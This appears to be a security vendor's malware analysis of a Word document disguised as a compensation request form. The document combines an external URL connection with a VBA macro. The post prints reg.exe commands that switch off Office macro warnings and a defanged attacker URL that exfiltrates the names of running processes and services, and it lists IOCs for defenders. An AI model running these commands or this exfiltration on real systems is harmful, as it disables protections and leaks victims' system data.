Malicious Word File Disguised as Compensation Request Form (External Connection + VBA Macro)

With malicious document files being distributed in various document formats such as HWP, DOC, XSLX, and PDF, it is safe to say that such a document-based malware has become a new trend among attackers. In pursuit of this trend, ASEC analysis team has been publishing various articles that contain related information in our blog. Today, ASEC analysis team will share the information on the newly-found malicious Word document file.

This malicious Word document file takes a form of a ‘Compensation Request Form,’ and what is different from existing file is that it performs malicious External connection and uses VBA macro simultaneously. As individual files, ‘Malicious Word Documents with North Korea Related Materials’ introduced in the previous blog post also only performed External malicious URL connection, and it was the case in which operation is possible only when the new document (macro) is connected where the URL is connected.


This Word file disguised as ‘Compensation Request Form’ contains both External connection and VBA macro and performs the features shown in the below.

Figure 1. – Details of document.xml.rels

As shown in the Figure 1 (document.xml.rels), it attempts to connect to the malicious URL specified as External, and operates the malicious VBA macro configured in settings.yml which is situated within the document.

  • External malicious URL: hxxp://ftcpark59.getenjoyment.net/1703/blank.php?v=sakim
  • Name of the file with VBA macro code: settings.yml

Normally, when a VBA macro is created within a Word file, a file named ‘vbaProject.bin’ is created, but it is speculated that for this malicious Word file, the attacker intentionally made it with filename of ‘settings.yml.’

Figure 2. Name of saved macro

This document file was created to prompt users to enter personal information and account number for retrieval of the compensation. ASEC analysis team believe that the attacker intentionally designed the document this way to prompt user to enable malicious behaviors. The reasoning behind this is the fact that VBA macro operates on certain keystrokes.

  1. Configure office security settings so that the macro can be executed at all times (Registry value change).

When the macro is enabled, it performs the following features:

Change registry value for versions from 10 to 19 so that settings of multiple versions can be changed. If ‘VBAWarnings’ value is set to ‘1’, always include internal macro in Microsoft Word.

reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\13.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\17.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\18.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\19.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
Table 1. Command for registry change

2. Upon accessing the URL, transmit (leak) information including names of running services and processes.

  • Malicious URL to access macro: hxxp://ftcpark59.getenjoyment.net/1703/v.php?w=sakim&v=
  • Extract names of running services and processes then attempt to connect after respectively attaching extracted information behind the URL (URL/Service Name/Process Name)
hxxp://ftcpark59.getenjoyment.net/1703/v.php?w=sakim&v=aelookupsvc appinfo eventsystem fdrespub fontcache gpsvc iphlpsvc lanmanserver lanmanworkstation lmhosts…(omitted)… smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe…(omitted)… conhost.exe reg.exe conhost.exe
Table 2. – Example of malicious URL connection

Currently, no data is additionally downloaded after External connection URL, and only the information leakage above is executed. It is assumed that the malware will follow the attacker’s directive and download additional file in certain environment where C2 is connected.

AhnLab’s anti-malware solutions detect and block the files above using the following alias.

[File Detection]
Downloader/DOC.Generic

[IOC Info]
hxxp://ftcpark59.getenjoyment.net/1703/blank.php?v=sakim
hxxp://ftcpark59.getenjoyment.net/1703/v.php?w=sakim&v=

3.4 5 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments